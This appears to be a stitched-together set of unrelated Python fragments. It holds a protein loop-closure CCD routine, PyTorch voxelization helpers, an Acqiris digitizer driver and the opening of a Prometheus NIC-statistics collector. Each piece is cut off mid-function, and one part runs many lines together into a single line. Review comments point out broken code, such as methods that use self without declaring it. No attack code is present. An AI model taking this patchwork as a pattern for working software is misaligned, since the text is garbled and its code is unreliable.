    # pluggable self.modify_angle_procedure, unrounded approx_equal checks
    # and utils.get_rmsd. NOTE(review): unlike the injected run(), the
    # early-exit test below has no abs() - confirm whether that is intended.
    # self.states.add(sites_cart=self.moving_h.atoms().extract_xyz())
    phi_psi_atoms = utils.get_phi_psi_atoms(self.moving_h)
    # here we can start a ccd cycle
    self.n_iter = 0
    rmsd_good = 1000
    previous_rmsd = 1000
    self.early_exit = False
    while (rmsd_good > self.needed_rmsd
        and self.n_iter <= self.max_number_of_iterations
        and not self.early_exit):
      # print_rama_stats(phi_psi_atoms, r)
      # for phi_psi_pair in phi_psi_atoms[:-1]:
      # check rama again separately before the cycle
      # list_rama_outliers(phi_psi_atoms, r)
      for phi_psi_pair, rama_key in phi_psi_atoms:
        before_rama_score = utils.get_rama_score(
            phi_psi_pair, self.r, rama_key, round_coords=True)
        rama_score = before_rama_score
        # print "rama score:", rama_score, "->",
        for i, atoms in enumerate(phi_psi_pair):
          # current phi-psi angles:
          # find the optimal angle
          ccd_angle = self._find_angle(atoms[1].xyz, atoms[2].xyz)
          # print "phi_psi_angles", phi_psi_angles
          # rama_score = r.evaluate("general", phi_psi_angles)
          # print "rama_score", rama_score
          angle_modified = self.modify_angle_procedure(ccd_angle)
          phi_psi_angles = utils.get_pair_angles(phi_psi_pair)
          before_rotation_rama_score = utils.get_rama_score(
              phi_psi_pair, self.r, rama_key, round_coords=True)
          if (ramalyze.evalScore(rama_key, before_rotation_rama_score) ==
              RAMALYZE_OUTLIER):
              # or ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_ALLOWED):
            # assert i == 0
            if i != 0:
              # this is a error, we should spot rama outliers on the first angle
              print "i", i
              print pair_info(phi_psi_pair)
              print "rama_key", rama_key
              print "before_rotation_rama_score", before_rotation_rama_score,
              print ramalyze.evalScore(rama_key, before_rotation_rama_score)
              break
            # correct it to the nearest non-outlier region
            target_phi_psi = utils.find_nearest_non_outlier_region(
                phi_psi_pair, self.r, rama_key)
            # print "For outlier:", phi_psi_angles, target_phi_psi
            # here we want to correct outlier regardless the target function
            # outcome and proceed to the next phi-psi pair
            now_psi_angle0 = utils.get_dihedral_angle(phi_psi_pair[1])
            utils.rotate_atoms_around_bond(
                self.moving_h, atoms[1], atoms[2],
                angle=-phi_psi_angles[0]+target_phi_psi[0])
            # now psi angle
            now_psi_angle = utils.get_dihedral_angle(phi_psi_pair[1])
            # print "psi angles:", now_psi_angle0, now_psi_angle
            angles_ok = (approx_equal(now_psi_angle0-now_psi_angle, 0) or
                approx_equal(now_psi_angle0-now_psi_angle, 360) or
                approx_equal(now_psi_angle0-now_psi_angle, -360))
            assert angles_ok
            # approx_equal(now_psi_angle0, now_psi_angle)
            # assert now_psi_angle0 == now_psi_angle
            utils.rotate_atoms_around_bond(
                self.moving_h, atoms[2], atoms[3],
                angle=-now_psi_angle+target_phi_psi[1])
            approx_equal(
                utils.get_dihedral_angle(phi_psi_pair[0]), target_phi_psi[0])
            approx_equal(
                utils.get_dihedral_angle(phi_psi_pair[1]), target_phi_psi[1])
            resulting_rama_ev = utils.rama_evaluate(
                phi_psi_pair, self.r, rama_key)
            assert resulting_rama_ev == RAMALYZE_FAVORED, resulting_rama_ev
            break # we are done with this phi_psi_pair
          # rotate the whole thing around
          utils.rotate_atoms_around_bond(
              self.moving_h, atoms[1], atoms[2], angle=angle_modified)
          after_rotation_rama_score = utils.get_rama_score(
              phi_psi_pair, self.r, rama_key, round_coords=True)
          # print "before/after rotation rama:", before_rotation_rama_score, after_rotation_rama_score
          # if before_rotation_rama_score > after_rotation_rama_score:
          if ramalyze.evalScore(rama_key, after_rotation_rama_score) == \
              RAMALYZE_OUTLIER:
            # rotate back!!! / not always
            # print "  rotate back"
            if True: # always
              utils.rotate_atoms_around_bond(
                  self.moving_h, atoms[1], atoms[2], angle=-angle_modified)
              s = utils.get_rama_score(
                  phi_psi_pair, self.r, rama_key, round_coords=True)
              assert utils.rama_score_evaluate(rama_key, s) != \
                  RAMALYZE_OUTLIER, s
        # new rama score:
        after_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key)
        if after_rama_score + 1e-7 < before_rama_score:
          pass
          # print "before, after", before_rama_score, after_rama_score
          # STOP()
      rmsd_good = utils.get_rmsd(
          self.fixed_ref_atoms,
          [self.moving_h.atoms()[x].xyz for x in self.moving_ref_atoms_iseqs])
      self.resulting_rmsd = rmsd_good
      # print "n_iter, rmsd:", n_iter, rmsd_good,
      # print get_main_chain_rmsd(moving_h, original_h)
      # self.states.add(sites_cart=self.moving_h.atoms().extract_xyz())
      # if n_iter % 100 == 0:
      #   moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter)
      self.n_iter += 1
      self.early_exit = previous_rmsd - rmsd_good < self.convergence_diff
      previous_rmsd = rmsd_good
    # print "number of iterations:", n_iter
        # voxelnet does occupancy but with a bit of randomness in terms of
        # the reflectance value i think
        inbounds = self.get_inbounds(xyz, Z, Y, X, already_mem=True)
        x, y, z = xyz[:,:,0], xyz[:,:,1], xyz[:,:,2]
        mask = torch.zeros_like(x)
        mask[inbounds] = 1.0
        # set the invalid guys to zero
        # we then need to zero out 0,0,0
        # (this method seems a bit clumsy)
        x = x*mask
        y = y*mask
        z = z*mask
        x = torch.round(x)
        y = torch.round(y)
        z = torch.round(z)
        x = torch.clamp(x, 0, X-1).int()
        y = torch.clamp(y, 0, Y-1).int()
        z = torch.clamp(z, 0, Z-1).int()
        # flatten coordinates and scatter into a flat occupancy buffer
        x = x.view(B*N)
        y = y.view(B*N)
        z = z.view(B*N)
        dim3 = X
        dim2 = X * Y
        dim1 = X * Y * Z
        base = torch.arange(0, B, dtype=torch.int32,
                            device=torch.device('cuda'))*dim1
        base = torch.reshape(base, [B, 1]).repeat([1, N]).view(B*N)
        vox_inds = base + z * dim2 + y * dim3 + x
        voxels = torch.zeros(B*Z*Y*X, device=torch.device('cuda')).float()
        voxels[vox_inds.long()] = 1.0
        # zero out the singularity (all out-of-bounds points collapsed to
        # index 0,0,0 by the masking above)
        voxels[base.long()] = 0.0
        voxels = voxels.reshape(B, 1, Z, Y, X)
        # B x 1 x Z x Y x X
        return voxels

    def unproject_rgb_to_mem(self, rgb_camB, Z, Y, X, pixB_T_camA):
        # rgb_camB is B x C x H x W
        # pixB_T_camA is B x 4 x 4
        # rgb lives in B pixel coords
        # we want everything in A memory coords
        # this puts each C-dim pixel in the rgb_camB
        # along a ray in the voxelgrid
        B, C, H, W = list(rgb_camB.shape)
        xyz_memA = gridcloud3d(B, Z, Y, X, norm=False)
        # grid_z, grid_y, grid_x = meshgrid3d(B, Z, Y, X)
        # # these are B x Z x Y x X
        # # these represent the mem grid coordinates
        # # we need to convert these to pixel coordinates
        # x = torch.reshape(grid_x, [B, -1])
        # y = torch.reshape(grid_y, [B, -1])
        # z = torch.reshape(grid_z, [B, -1])
        # # these are B x N
        # xyz_mem = torch.stack([x, y, z], dim=2)
        xyz_camA = self.Mem2Ref(xyz_memA, Z, Y, X)
        xyz_pixB = utils_geom.apply_4x4(pixB_T_camA, xyz_camA)
        normalizer = torch.unsqueeze(xyz_pixB[:,:,2], 2)
        EPS = 1e-6
        # perspective divide, clamped to avoid division by ~zero depth:
        xy_pixB = xyz_pixB[:,:,:2]/torch.clamp(normalizer, min=EPS)
        # this is B x N x 2
        # this is the (floating point) pixel coordinate of each voxel
        x_pixB, y_pixB = xy_pixB[:,:,0], xy_pixB[:,:,1]
        # these are B x N
        if (0):
            # handwritten version
            values = torch.zeros([B, C, Z*Y*X], dtype=torch.float32)
            for b in list(range(B)):
                values[b] = utils_samp.bilinear_sample_single(
                    rgb_camB[b], x_pixB[b], y_pixB[b])
        else:
            # native pytorch version
            y_pixB, x_pixB = normalize_grid2d(y_pixB, x_pixB, H, W)
            # since we want a 3d output, we need 5d tensors
            z_pixB = torch.zeros_like(x_pixB)
            xyz_pixB = torch.stack([x_pixB, y_pixB, z_pixB], axis=2)
            rgb_camB = rgb_camB.unsqueeze(2)
            xyz_pixB = torch.reshape(xyz_pixB, [B, Z, Y, X, 3])
            values = F.grid_sample(rgb_camB, xyz_pixB)
        values = torch.reshape(values, (B, C, Z, Y, X))
        return values

    def apply_pixX_T_memR_to_voxR(self, pix_T_camX, camX_T_camR, voxR,
                                  D, H, W, z_far=None, noise_amount=0.0,
                                  grid_z_vec=None, logspace_slices=False):
        # mats are B x 4 x 4
        # voxR is B x C x Z x Y x X
        # H, W, D indicates how big to make the output
        # returns B x C x D x H x W
        B, C, Z, Y, X = list(voxR.shape)
        # z_near = np.maximum(self.ZMIN, 0.1)
        # z_far = self.ZMAX
        z_near = 0.1
        if z_far is None:
            z_far = self.ZMAX
        # NOTE(review): debug print left in - consider removing:
        print(z_far)
        if grid_z_vec is None:
            if logspace_slices:
                grid_z_vec = torch.exp(torch.linspace(
                    np.log(z_near), np.log(z_far), steps=D,
                    dtype=torch.float32, device=torch.device('cuda')))
                if noise_amount > 0.:
                    print('cannot add noise to logspace sampling yet')
            else:
                grid_z_vec = torch.linspace(
                    z_near, z_far, steps=D,
                    dtype=torch.float32, device=torch.device('cuda'))
                if noise_amount > 0.:
                    # jitter each depth slice by up to half the slice spacing
                    diff = grid_z_vec[1] - grid_z_vec[0]
                    noise = torch.rand(grid_z_vec.shape).float().cuda() * \
                        diff * 0.5 * noise_amount
                    # noise = torch.randn(grid_z_vec.shape).float().cuda() * noise_std
                    # noise = torch.randn(grid_z_vec.shape).float().cuda() * noise_std
                    grid_z_vec = grid_z_vec + noise
                    grid_z_vec = grid_z_vec.clamp(min=z_near)
        grid_z = torch.reshape(grid_z_vec, [1, 1, D, 1, 1])
        grid_z = grid_z.repeat([B, 1, 1, H, W])
        grid_z = torch.reshape(grid_z, [B*D, 1, H, W])
        pix_T_camX__ = torch.unsqueeze(pix_T_camX, axis=1).repeat([1, D, 1, 1])
        pix_T_camX = torch.reshape(pix_T_camX__, [B*D, 4, 4])
        xyz_camX = utils_geom.depth2pointcloud(grid_z, pix_T_camX)
        camR_T_camX = utils_geom.safe_inverse(camX_T_camR)
        camR_T_camX_ = torch.unsqueeze(camR_T_camX, dim=1).repeat([1, D, 1, 1])
        camR_T_camX = torch.reshape(camR_T_camX_, [B*D, 4, 4])
        mem_T_cam = self.get_mem_T_ref(B*D, Z, Y, X)
        memR_T_camX = matmul2(mem_T_cam, camR_T_camX)
        xyz_memR = utils_geom.apply_4x4(memR_T_camX, xyz_camX)
        xyz_memR = torch.reshape(xyz_memR, [B, D*H*W, 3])
        samp = utils_samp.sample3d(voxR, xyz_memR, D, H, W)
        # samp is B x H x W x D x C
        return samp, grid_z_vec

    def voxelize_zoom(self, xyz_ref, lrt, Z, Y, X):
        # voxelize a ref-coords pointcloud inside the zoom box given by lrt
        B, N, D = list(xyz_ref.shape)
        assert(D==3)
        # xyz_ref = Zoom2Ref(xyz_zoom, lrt, Z2, Y2, X2, additive_pad=additive_pad)
        # NOTE(review): Ref2Zoom is called without `self.` here, unlike
        # voxelize_near_xyz below - likely a missing `self.`; confirm.
        xyz_zoom = Ref2Zoom(xyz_ref, lrt, Z, Y, X, additive_pad=0.0)
        # if already_mem:
        #     xyz_mem = xyz_ref
        # else:
        #     xyz_mem = self.Ref2Mem(xyz_ref, Z, Y, X)
        vox = self.get_occupancy(xyz_zoom, Z, Y, X)
        return vox

    def voxelize_near_xyz(self, xyz_ref, xyz, Z, Y, X,
                          sz=16.0, sy=16.0, sx=16.0):
        # xyz_ref is B x N x 3; it is a pointcloud in ref coords
        # xyz is B x 3; it is a point in ref coords
        # sz, sy, sz are the size to grab in 3d, in ref units (usually meters)
        B, N, D = list(xyz_ref.shape)
        assert(D==3)
        # xyz_ref = Zoom2Ref(xyz_zoom, lrt, Z2, Y2, X2, additive_pad=additive_pad)
        # build an axis-aligned box of size (sx, sy, sz) centered at xyz:
        xyzlist = xyz.unsqueeze(1)
        # B x 1 x 3
        lxlist = torch.ones_like(xyzlist[:,:,0])*sx
        lylist = torch.ones_like(xyzlist[:,:,0])*sy
        lzlist = torch.ones_like(xyzlist[:,:,0])*sz
        lenlist = torch.stack([lxlist, lylist, lzlist], dim=2)
        # cube this size
        rotlist = torch.zeros_like(xyzlist)
        # no rot
        boxlist = torch.cat([xyzlist, lenlist, rotlist], dim=2)
        # boxlist is B x 1 x 9
        lrtlist = utils_geom.convert_boxlist_to_lrtlist(boxlist)
        lrt = lrtlist.squeeze(1)
        # lrt is B x 19
        xyz_zoom = self.Ref2Zoom(xyz_ref, lrt, Z, Y, X, additive_pad=0.0)
        vox = self.get_occupancy(xyz_zoom, Z, Y, X)
        # vox = torch.zeros([B, 1, Z, Y, X]).float().cpu()
        # for b in list(range(B)):
        #     vox[b] = self.get_occupancy_single(xyz_zoom[b].cpu(), Z, Y, X)
        # vox = vox.cuda()
        # return the lrt also, so that we can convert from here back to
        # ref coords (with Zoom2Ref)
        return vox, lrt

    # NOTE(review): the three functions below reference `self` but are not
    # declared with a `self` parameter - they look like methods that lost
    # their first argument (or module functions that should not use self).
    # Confirm and fix upstream before relying on them.
    def resample_to_target_views(occRs, camRs_T_camPs):
        # resample to the target view
        # occRs is B x S x Y x X x Z x 1
        # camRs_T_camPs is B x S x 4 x 4
        # NOTE(review): the unpack below implies B x S x 1 x Z x Y x X,
        # which disagrees with the comment above - verify the layout.
        B, S, _, Z, Y, X = list(occRs.shape)
        # we want to construct a mat memR_T_memP
        cam_T_mem = self.get_ref_T_mem(B, Z, Y, X)
        mem_T_cam = self.get_mem_T_ref(B, Z, Y, X)
        cams_T_mems = cam_T_mem.unsqueeze(1).repeat(1, S, 1, 1)
        mems_T_cams = mem_T_cam.unsqueeze(1).repeat(1, S, 1, 1)
        cams_T_mems = torch.reshape(cams_T_mems, (B*S, 4, 4))
        mems_T_cams = torch.reshape(mems_T_cams, (B*S, 4, 4))
        camRs_T_camPs = torch.reshape(camRs_T_camPs, (B*S, 4, 4))
        memRs_T_memPs = torch.matmul(
            torch.matmul(mems_T_cams, camRs_T_camPs), cams_T_mems)
        memRs_T_memPs = torch.reshape(memRs_T_memPs, (B, S, 4, 4))
        occRs, valid = resample_to_view(occRs, memRs_T_memPs, multi=True)
        return occRs, valid

    def resample_to_target_view(occRs, camR_T_camP):
        # single-view variant of resample_to_target_views
        B, S, Z, Y, X, _ = list(occRs.shape)
        cam_T_mem = self.get_ref_T_mem(B, Z, Y, X)
        mem_T_cam = self.get_mem_T_ref(B, Z, Y, X)
        memR_T_memP = torch.matmul(
            torch.matmul(mem_T_cam, camR_T_camP), cam_T_mem)
        occRs, valid = resample_to_view(occRs, memR_T_memP, multi=False)
        return occRs, valid

    def resample_to_view(feats, new_T_old, multi=False):
        # feats is B x S x c x Y x X x Z
        # it represents some scene features in reference/canonical coordinates
        # we want to go from these coords to some target coords
        # new_T_old is B x 4 x 4
        # it represents a transformation between two "mem" systems
        # or if multi=True, it's B x S x 4 x 4
        B, S, C, Z, Y, X = list(feats.shape)
        # we want to sample for each location in the bird grid
        # xyz_mem = gridcloud3d(B, Z, Y, X)
        grid_y, grid_x, grid_z = meshgrid3d(B, Z, Y, X)
        # these are B x BY x BX x BZ
        # these represent the mem grid coordinates
        # we need to convert these
to pixel coordinates x = torch.reshape(grid_x, [B, -1]) y = torch.reshape(grid_y, [B, -1]) z = torch.reshape(grid_z, [B, -1]) # these are B x N xyz_mem = torch.stack([x, y, z], dim=2) # this is B x N x 3 xyz_mems = xyz_mem.unsqueeze(1).repeat(1, S, 1, 1) # this is B x S x N x 3 xyz_mems_ = xyz_mems.view(B*S, Y*X*Z, 3) feats_ = feats.view(B*S, C, Z, Y, X) if multi: new_T_olds
#!/usr/bin/env python
import AcqirisWrapper as Aq
import InstrumentDriver
from InstrumentConfig import InstrumentQuantity
import numpy as np
# for long integer py2/py3 compatibility
from builtins import int


class Error(Exception):
    # base exception for this driver module
    pass


class Driver(InstrumentDriver.InstrumentWorker):
    """ This class implements the Acqiris card driver"""

    def performOpen(self, options={}):
        """Perform the operation of opening the instrument connection"""
        # init object
        self.dig = None
        self.timeout = self.dComCfg['Timeout']
        # keep track of sampled traces, elements are I, Q, signal, single shot
        self.lTrace = [np.array([]), np.array([]), 0.0, np.array([], dtype=complex)]
        self.lSignalNames = ['Ch1 - Data', 'Ch2 - Data', 'Signal', 'Signal - Single shot']
        self.dt = 1.0
        try:
            # open connection
            self.dig = Aq.AcqirisDigitizer()
            self.dig.init(self.comCfg.address, True, True)
        except Exception as e:
            # re-cast afdigitizer errors as a generic communication error
            msg = str(e)
            raise InstrumentDriver.CommunicationError(msg)

    def performClose(self, bError=False, options={}):
        """Perform the close instrument connection operation"""
        # check if digitizer object exists
        try:
            if self.dig is None:
                # do nothing, object doesn't exist (probably was never opened)
                return
        except:
            # never return error here, do nothing, object doesn't exist
            return
        try:
            # close and remove object
            self.dig.close()
            self.dig.closeAll()
            del self.dig
        except:
            # never return error here
            pass

    def performSetValue(self, quant, value, sweepRate=0.0, options={}):
        """Perform the Set Value instrument operation. This function should
        return the actual value set by the instrument"""
        # start with setting current quant value
        quant.setValue(value)
        # get values from relevant quants
        if quant.name == 'Acquisition type':
            mode = int(quant.getCmdStringFromValue(value))
            self.dig.configMode(mode)
            # update # of samples parameter, since it may change when averaging
            self.readValueFromOther('Number of samples')
        elif quant.name in ('Number of samples', 'Number of segments'):
            # first, single trace cfg, get values from relevant quants and set all
            nSample = int(self.getValue('Number of samples'))
            nSegment = int(self.getValue('Number of segments'))
            self.dig.configMemory(nSample, nSegment)
            # set averager settings
            if quant.name == 'Number of samples':
                self.dig.configAvgConfig(1, 'NbrSamples', int(value))
                self.dig.configAvgConfig(2, 'NbrSamples', int(value))
            elif quant.name == 'Number of segments':
                self.dig.configAvgConfig(1, 'NbrSegments', int(value))
                self.dig.configAvgConfig(2, 'NbrSegments', int(value))
        elif quant.name == 'Number of averages':
            self.dig.configAvgConfig(1, 'NbrWaveforms', int(value))
            self.dig.configAvgConfig(2, 'NbrWaveforms', int(value))
        elif quant.name in ('Sample interval', 'Delay time'):
            sampInterval = self.getValue('Sample interval')
            delayTime = self.getValue('Delay time')
            # set single trace or sample interval
            self.dig.configHorizontal(sampInterval, delayTime)
            if quant.name == 'Delay time':
                # for averaging mode, set delay in data points
                self.dig.configAvgConfig(1, 'StartDelay', int(value/sampInterval))
                self.dig.configAvgConfig(2, 'StartDelay', int(value/sampInterval))
        elif quant.name in ('Trig source', 'Trig coupling', 'Trig slope', 'Trig level'):
            # get values from relevant quants and set all
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            trigCoupling = int(self.getCmdStringFromValue('Trig coupling'))
            trigSlope = int(self.getCmdStringFromValue('Trig slope'))
            trigLevel = self.getValue('Trig level')
            # trig level is in percentage if trig is Ch1/Ch2, convert to voltage
            if trigSource == 1:
                fullRange = float(self.getCmdStringFromValue('Ch1 - Range'))
                offset = float(self.getValue('Ch1 - Offset'))
                trigLevel = 100*(0.5 - (offset + fullRange/2.0 - trigLevel)/fullRange)
            elif trigSource == 2:
                fullRange = float(self.getCmdStringFromValue('Ch2 - Range'))
                offset = float(self.getValue('Ch2 - Offset'))
                trigLevel = 100*(0.5 - (offset + fullRange/2.0 - trigLevel)/fullRange)
            else:
                # trig level is in millivolt
                trigLevel = trigLevel*1000.0
            self.dig.configTrigSource(trigSource, trigCoupling, trigSlope, trigLevel, trigLevel2=0.0)
            # change active trigger if source was changed
            if quant.name == 'Trig source':
                dPattern = {1: int(0x00000001), 2: int(0x00000002), -1: int(0x80000000)}
                self.dig.configTrigClass(dPattern[trigSource])
        elif quant.name in ('10 MHz Reference'):
            # NOTE(review): `in` on a plain string is substring matching; a
            # one-element tuple ('10 MHz Reference',) was probably intended.
            # Works here because the names compared are exact matches.
            # get values from relevant quants and set all
            clockType = int(self.getCmdStringFromValue('10 MHz Reference'))
            self.dig.configExtClock(clockType)
        elif quant.name == 'Ch1 - Enabled':
            # do nothing for enabling/disabling
            pass
        elif quant.name in ('Ch1 - Coupling', 'Ch1 - Bandwidth', 'Ch1 - Range', 'Ch1 - Offset'):
            # get values from relevant quants and set all
            fullScale = float(self.getCmdStringFromValue('Ch1 - Range'))
            offset = float(self.getValue('Ch1 - Offset'))
            coupling = int(self.getCmdStringFromValue('Ch1 - Coupling'))
            bandwidth = int(self.getCmdStringFromValue('Ch1 - Bandwidth'))
            self.dig.configVertical(1, fullScale, -offset, coupling, bandwidth)
            # re-set trigger level, if needed (to reflect new offset/range)
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            if trigSource == 1:
                trigLev = float(self.getValue('Trig level'))
                self.sendValueToOther('Trig level', trigLev)
        elif quant.name == 'Ch2 - Enabled':
            # do nothing
            pass
        elif quant.name in ('Ch2 - Coupling', 'Ch2 - Bandwidth', 'Ch2 - Range', 'Ch2 - Offset'):
            # get values from relevant quants and set all
            fullScale = float(self.getCmdStringFromValue('Ch2 - Range'))
            offset = float(self.getValue('Ch2 - Offset'))
            coupling = int(self.getCmdStringFromValue('Ch2 - Coupling'))
            bandwidth = int(self.getCmdStringFromValue('Ch2 - Bandwidth'))
            self.dig.configVertical(2, fullScale, -offset, coupling, bandwidth)
            # re-set trigger level, if needed (to reflect new offset/range)
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            if trigSource == 2:
                trigLev = float(self.getValue('Trig level'))
                self.sendValueToOther('Trig level', trigLev)
        elif quant.name in ('Modulation frequency', 'Skip start', 'Length', 'Use Ch2 as reference'):
            # do nothing for these quantities, the value will be stored in local quant
            pass
        # finish set value with get value, to make sure we catch any coercing
        return self.performGetValue(quant)

    def performGetValue(self, quant, options={}):
        """Perform the Get Value instrument operation"""
        aqType = self.getValue('Acquisition type')
        if quant.name == 'Acquisition type':
            value = quant.getValueFromCmdString(str(self.dig.getMode()[0]))
        elif quant.name == 'Number of samples':
            if aqType == 'Normal':
                value = float(self.dig.getMemory()[0])
            else:
                value = float(self.dig.getAvgConfig(1, 'NbrSamples'))
        elif quant.name == 'Number of segments':
            if aqType == 'Normal':
                value = float(self.dig.getMemory()[1])
            else:
                value = float(self.dig.getAvgConfig(1, 'NbrSegments'))
        elif quant.name == 'Number of averages':
            value = float(self.dig.getAvgConfig(1, 'NbrWaveforms'))
        elif quant.name == 'Sample interval':
            value = float(self.dig.getHorizontal()[0])
        elif quant.name == 'Delay time':
            if aqType == 'Normal':
                value = float(self.dig.getHorizontal()[1])
            else:
                # convert from delay in points to delay in time
                sampInterval = self.getValue('Sample interval')
                value = sampInterval * self.dig.getAvgConfig(1, 'StartDelay')
        elif quant.name == 'Trig source':
            pattern = abs(self.dig.getTrigClass()[0])
            dPattern = {int(0x00000001): 1, int(0x00000002): 2, int(0x80000000): -1}
            value = quant.getValueFromCmdString(str(dPattern[pattern]))
        elif quant.name == 'Trig coupling':
            # get from current trig source
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            value = quant.getValueFromCmdString( \
                str(self.dig.getTrigSource(trigSource)[0]))
        elif quant.name == 'Trig slope':
            # get from current trig source
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            value = quant.getValueFromCmdString( \
                str(self.dig.getTrigSource(trigSource)[1]))
        elif quant.name == 'Trig level':
            # get from current trig source
            trigSource = int(self.getCmdStringFromValue('Trig source'))
            trigLevel = self.dig.getTrigSource(trigSource)[2]
            # if Ch1/Ch2, trig level is percentage of full range
            if trigSource == 1:
                fullRange = float(self.getCmdStringFromValue('Ch1 - Range'))
                offset = float(self.getValue('Ch1 - Offset'))
                value = offset + fullRange*trigLevel/100.0
            elif trigSource == 2:
                fullRange = float(self.getCmdStringFromValue('Ch2 - Range'))
                offset = float(self.getValue('Ch2 - Offset'))
                value = offset + fullRange*trigLevel/100.0
            else:
                # trig level is in millivolt
                value = trigLevel/1000.0
        elif quant.name in ('10 MHz Reference'):
            # get values from relevant quants and set all
            value = quant.getValueFromCmdString(str(self.dig.getExtClock()[0]))
        elif quant.name == 'Ch1 - Enabled':
            # do nothing for enabling/disabling
            value = quant.getValue()
        elif quant.name == 'Ch1 - Coupling':
            value = quant.getValueFromCmdString(str(self.dig.getVertical(1)[2]))
        elif quant.name == 'Ch1 - Bandwidth':
            value = quant.getValueFromCmdString(str(self.dig.getVertical(1)[3]))
        elif quant.name == 'Ch1 - Range':
            value = quant.getValueFromCmdString('%.2f' % self.dig.getVertical(1)[0])
        elif quant.name == 'Ch1 - Offset':
            # driver stores offset negated relative to hardware (see configVertical)
            value = - self.dig.getVertical(1)[1]
        elif quant.name == 'Ch2 - Enabled':
            # do nothing
            value = quant.getValue()
        elif quant.name == 'Ch2 - Coupling':
            value = quant.getValueFromCmdString(str(self.dig.getVertical(2)[2]))
        elif quant.name == 'Ch2 - Bandwidth':
            value = quant.getValueFromCmdString(str(self.dig.getVertical(2)[3]))
        elif quant.name == 'Ch2 - Range':
            value = quant.getValueFromCmdString('%.2f' % self.dig.getVertical(2)[0])
        elif quant.name == 'Ch2 - Offset':
            value = - self.dig.getVertical(2)[1]
        # signals
        elif quant.name in self.lSignalNames:
            # special case for hardware looping
            if self.isHardwareLoop(options):
                value = self.getSignalHardwareLoop(quant, options)
            else:
                # no hardware loop, just get traces if first call
                if self.isFirstCall(options):
                    self.getTraces(bArm=not self.isHardwareTrig(options))
                # return correct data
                indx = self.lSignalNames.index(quant.name)
                if quant.name in ('Ch1 - Data', 'Ch2 - Data'):
                    value = InstrumentQuantity.getTraceDict(self.lTrace[indx], dt=self.dt)
                else:
                    value = self.lTrace[indx]
        elif quant.name in ('Modulation frequency', 'Skip start', 'Length', 'Use Ch2 as reference', 'Enable demodulation'):
            # just return the quantity value
            value = quant.getValue()
        return value

    def _callbackProgress(self, progress):
        """Report progress to server, as text string"""
        s = 'Acquiring traces (%.0f%%)' % (100*progress)
        self.reportStatus(s)

    def performArm(self, quant_names, options={}):
        """Perform the instrument arm operation"""
        # make sure we are arming for reading traces, if not return
        signal_names = ['Ch%d - Data' % (n + 1) for n in range(2)]
        signal_arm = [name in signal_names for name in quant_names]
        if not np.any(signal_arm):
            return
        # start acquisition
        if self.isHardwareLoop(options):
            (seq_no, n_seq) = self.getHardwareLoopIndex(options)
            nSample = int(self.getValue('Number of samples'))
            nAverage = int(self.getValue('Number of averages'))
            self.dig.getRoundRobinData(nSample, n_seq, nAverage,
                                       bConfig=True, bArm=True, bMeasure=False)
        else:
            self.getTraces(bArm=True, bMeasure=False)

    def getSignalHardwareLoop(self, quant, options):
        """Get data from round-robin type averaging"""
        (seq_no, n_seq) = self.getHardwareLoopIndex(options)
        # NOTE: the source chunk is truncated here; the remainder of this
        # method lies outside the visible range.
# <filename>kvmagent/kvmagent/plugins/prometheus.py <- extraction artifact (original filename marker), kept as a comment
# NOTE(review): this module is Python 2 code (0644 octal literals, dict.keys()
# slicing below) — do not run under Python 3 without porting.
import os.path
import threading
import typing

from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, REGISTRY

from kvmagent import kvmagent
from zstacklib.utils import http
from zstacklib.utils import jsonobject
from zstacklib.utils import lock
from zstacklib.utils import lvm
from zstacklib.utils import misc
from zstacklib.utils import thread
from zstacklib.utils.bash import *
from zstacklib.utils.ip import get_nic_supported_max_speed

# NOTE(review): `log`, `linux`, `time` and `Template` are not imported
# explicitly in the visible code — presumably provided via the star import
# from zstacklib.utils.bash; confirm.
logger = log.get_logger(__name__)

collector_dict = {}  # type: Dict[str, threading.Thread]
latest_collect_result = {}
collectResultLock = threading.RLock()
QEMU_CMD = kvmagent.get_qemu_path().split("/")[-1]


def read_number(fname):
    # read an integer from a sysfs-style file; 0 when the file is empty/absent
    res = linux.read_file(fname)
    return 0 if not res else int(res)


def collect_host_network_statistics():
    # sum rx/tx bytes, packets and errors over all physical NICs
    all_eths = os.listdir("/sys/class/net/")
    virtual_eths = os.listdir("/sys/devices/virtual/net/")

    interfaces = []
    for eth in all_eths:
        eth = eth.strip(' \t\n\r')
        if eth in virtual_eths:
            continue
        if eth == 'bonding_masters':
            continue
        elif not eth:
            continue
        else:
            interfaces.append(eth)

    all_in_bytes = 0
    all_in_packets = 0
    all_in_errors = 0
    all_out_bytes = 0
    all_out_packets = 0
    all_out_errors = 0
    for intf in interfaces:
        all_in_bytes += read_number("/sys/class/net/{}/statistics/rx_bytes".format(intf))
        all_in_packets += read_number("/sys/class/net/{}/statistics/rx_packets".format(intf))
        all_in_errors += read_number("/sys/class/net/{}/statistics/rx_errors".format(intf))
        all_out_bytes += read_number("/sys/class/net/{}/statistics/tx_bytes".format(intf))
        all_out_packets += read_number("/sys/class/net/{}/statistics/tx_packets".format(intf))
        all_out_errors += read_number("/sys/class/net/{}/statistics/tx_errors".format(intf))

    metrics = {
        'host_network_all_in_bytes': GaugeMetricFamily('host_network_all_in_bytes',
                                                       'Host all inbound traffic in bytes'),
        'host_network_all_in_packages': GaugeMetricFamily('host_network_all_in_packages',
                                                          'Host all inbound traffic in packages'),
        'host_network_all_in_errors': GaugeMetricFamily('host_network_all_in_errors',
                                                        'Host all inbound traffic errors'),
        'host_network_all_out_bytes': GaugeMetricFamily('host_network_all_out_bytes',
                                                        'Host all outbound traffic in bytes'),
        'host_network_all_out_packages': GaugeMetricFamily('host_network_all_out_packages',
                                                           'Host all outbound traffic in packages'),
        'host_network_all_out_errors': GaugeMetricFamily('host_network_all_out_errors',
                                                         'Host all outbound traffic errors'),
    }

    metrics['host_network_all_in_bytes'].add_metric([], float(all_in_bytes))
    metrics['host_network_all_in_packages'].add_metric([], float(all_in_packets))
    metrics['host_network_all_in_errors'].add_metric([], float(all_in_errors))
    metrics['host_network_all_out_bytes'].add_metric([], float(all_out_bytes))
    metrics['host_network_all_out_packages'].add_metric([], float(all_out_packets))
